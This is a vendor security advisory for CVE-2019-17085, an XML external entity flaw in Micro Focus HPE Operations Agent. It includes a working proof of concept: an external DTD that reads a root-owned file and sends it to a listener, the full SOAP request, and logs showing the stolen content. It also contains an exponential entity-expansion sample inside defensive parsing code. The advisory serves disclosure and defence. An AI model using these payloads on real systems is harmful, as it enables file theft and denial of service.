usd-2019-0050 (CVE-2019-17085) | Micro Focus HPE Operations Agent

Advisory ID: usd-2019-0050
CVE ID: CVE-2019-17085
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17085
Affected Product: Micro Focus HPE Operations Agent
Affected Version: 12.04.006
Vulnerability Type: CWE-611 Improper Restriction of XML External Entity Reference
Security Risk: High
Vendor URL: https://www.microfocus.com/
Vendor Status: Partially Fixed

Description

This vulnerability arises when untrusted XML input containing a reference to an external entity is processed by a weakly configured XML parser. Exploitation may lead to the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning from the perspective of the machine on which the parser runs, and other system impacts.

Proof of Concept (PoC)

File to be read:

To demonstrate the impact of the vulnerability, the file "password.txt" with the content "s3crEtPa55w0rd!" is created in the administrator's home directory on the vulnerable test server:

[root@testserver ~]# pwd
/root
[root@testserver ~]# ls -l password.txt
-r-------- 1 root root 15 Aug 20 11:53 password.txt
[root@testserver ~]# cat password.txt && echo ""
s3crEtPa55w0rd!

Three XML entities are defined inside the "ev.xml" file, which is hosted on the attacker's HTTP listener. In the first step, the content of the file "password.txt" is read using the keyword "SYSTEM" and stored in the parameter entity "data".

The second step allows the attacker to send the content of the entity "data" to a URL under their control: the parameter entity "param1" declares a general entity "exfil" whose SYSTEM identifier carries the file content in the query string. In this PoC, the content is sent to localhost on port 8080.

[pentest@testserver www]$ cat ev.xml
<!ENTITY % data SYSTEM 'file:///root/password.txt'>
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1:8080/?%data;'>">

The following output shows the request prepared by the attacker, which is to be sent to the vulnerable server:

POST /com.hp.ov.eaagt.msga.hbp/bbcrpcserver HTTP/1.1
cache-control: no-cache
content-type: text/xml; charset=UTF-8
date: Mon, 19 Aug 2019 12:14:20 GMT
host: testserver:383
pragma: no-cache
senderid: e0259616-4e94-7582-0616-8d6e6075a371
soapaction: http://testserver/com.hp.ov.eaagt.msga.hbp/bbcrpcserver#HBP_HANDLER
targetid: unknown
targeturi: http://testserver/com.hp.ov.eaagt.msga.hbp/bbcrpcserver
user-agent: BBC 12.04.006; com.hp.ov.opc.reqs 00.00.000
Content-Length: 613

<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY % sp SYSTEM "http://127.0.0.1:8080/ev.xml">
%sp;
%param1;
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<HBP_HANDLER>
<serverName xsi:type="xs:string">&exfil;example.com</serverName>
<coreid xsi:type="xs:string">bf2147e4-eb74-75aa-1bb7-db1e4d06a771</coreid>
</HBP_HANDLER>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The attacker connects to the victim's server on port 383, where the vulnerable application is listening, and then sends the prepared request containing the XML payload:

[pentest@testserver ~]$ telnet 127.0.0.1 383
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
POST /com.hp.ov.eaagt.msga.hbp/bbcrpcserver HTTP/1.1
cache-control: no-cache
content-type: text/xml; charset=UTF-8
date: Mon, 19 Aug 2019 12:14:20 GMT
host: testserver:383
pragma: no-cache
senderid: e0259616-4e94-7582-0616-8d6e6075a371
soapaction: http://testserver/com.hp.ov.eaagt.msga.hbp/bbcrpcserver#HBP_HANDLER
targetid: unknown
targeturi: http://testserver/com.hp.ov.eaagt.msga.hbp/bbcrpcserver
user-agent: BBC 12.04.006; com.hp.ov.opc.reqs 00.00.000
Content-Length: 613

<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY % sp SYSTEM "http://127.0.0.1:8080/ev.xml">
%sp;
%param1;
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<HBP_HANDLER>
<serverName xsi:type="xs:string">&exfil;example.com</serverName>
<coreid xsi:type="xs:string">bf2147e4-eb74-75aa-1bb7-db1e4d06a771</coreid>
</HBP_HANDLER>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The server parses the XML payload contained in the attacker's request and fetches the external part of the DTD from the URL "http://127.0.0.1:8080/ev.xml". As a result, the server reads the internal file "password.txt" and sends its contents as a GET parameter to the address defined by the attacker.

The attacker's HTTP listener logs the content of the "password.txt" file:

[pentest@testserver www]$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
127.0.0.1 - - [20/Aug/2019 12:02:54] "GET /ev.xml HTTP/1.1" 200 -
127.0.0.1 - - [20/Aug/2019 12:02:54] "GET /?s3crEtPa55w0rd! HTTP/1.1" 301 -
127.0.0.1 - - [20/Aug/2019 12:02:54] "GET /?s3crEtPa55w0rd!/ HTTP/1.1" 200 -

Fix

The safest way to prevent XXE and exponential entity expansion attacks is always to disable DTDs (External Entities) completely. Additionally, OWASP publishes a Cheat Sheet on XXE prevention: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
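As an added illustration, which is neither the vendor's nor usd AG's code, of the advice above and of the retest noted in the timeline (an external-entities-only switch stopped the file read but not exponential expansion): a small inspector built on Python's standard-library expat parser, plus a front door that refuses every DOCTYPE. The sample payloads are constructed in the shape of the PoC request and are assumptions of this example.

```python
# Added example, not the vendor's code: a stdlib-only inspector that shows why
# switching off external entities alone leaves exponential expansion untouched,
# and a front door that applies OWASP's advice to refuse every DOCTYPE.
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET

class DtdRejected(ValueError): pass      # document carried a DOCTYPE
class _StopAfterDtd(Exception): pass     # DTD inspected, skip the content

def dtd_profile(data: bytes) -> dict:
    """Count what the DTD declares without resolving anything: 'external'
    entities (SYSTEM/PUBLIC id, the XXE vector) and 'nested' internal ones
    (the expansion vector an external-entities-only switch ignores)."""
    prof = {"doctype": False, "external": 0, "internal": 0, "nested": 0}
    p = expat.ParserCreate()
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)  # never fetch %sp;
    def on_doctype(name, sysid, pubid, has_internal_subset):
        prof["doctype"] = True
    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None:
            prof["external"] += 1
        else:
            prof["internal"] += 1
            prof["nested"] += int("&" in value)   # expat keeps refs literal here
    def on_end_doctype():
        raise _StopAfterDtd                  # never touch <r>&c;</r> and friends
    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.EndDoctypeDeclHandler = on_end_doctype
    try:
        p.Parse(data, True)                  # ExpatError if not well-formed
    except _StopAfterDtd:
        pass
    return prof

def parse_no_dtd(data: bytes) -> ET.Element:
    """'Disable DTDs completely': any DOCTYPE is refused, whatever it declares."""
    if dtd_profile(data)["doctype"]:
        raise DtdRejected("DOCTYPE is not accepted on this endpoint")
    return ET.fromstring(data)

# Constructed samples in the shape of the advisory's request body.
XXE = (b'<!DOCTYPE test [<!ELEMENT test ANY>\n'
       b'<!ENTITY % sp SYSTEM "http://127.0.0.1:8080/ev.xml">%sp;%param1;]>\n'
       b'<r><serverName>&exfil;example.com</serverName></r>')
LAUGHS = (b'<!DOCTYPE r [<!ENTITY a "aaaaaaaaaa">\n'
          b'<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">\n'
          b'<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">]><r>&c;</r>')
CLEAN = (b'<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/'
         b'envelope/"><SOAP-ENV:Body/></SOAP-ENV:Envelope>')
```

`dtd_profile` reports the XXE sample as one external entity and zero nested ones, and the expansion sample as zero external but two nested entities; only `parse_no_dtd` refuses both.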

References

Timeline

  • 2019-08-20: Initial notification sent to security-alert@hpe.com
  • 2019-08-20: After HPE's response: Advisory sent to security@microfocus.com
  • 2019-08-30: Reminder sent to security@microfocus.com
  • 2019-09-05: Reminder sent to security@microfocus.com
  • 2019-09-05: Contact request sent via web form at https://softwaresupport.softwaregrp.com/psrt
  • 2019-09-23: Reminder sent via web form at https://softwaresupport.softwaregrp.com/psrt
  • 2019-10-11: Micro Focus replies that a mitigation is already configurable and that they are working on a security alert. Our retest shows that setting the xpl.net.DISABLE_EXT_ENTITIES option mitigates arbitrary file reading via an XML external entity attack, but fails to mitigate exponential entity expansion attacks.
  • 2022-02-25: Security advisory released by usd AG.

Credits

This security vulnerability was identified by Tobias Neitzel of usd AG.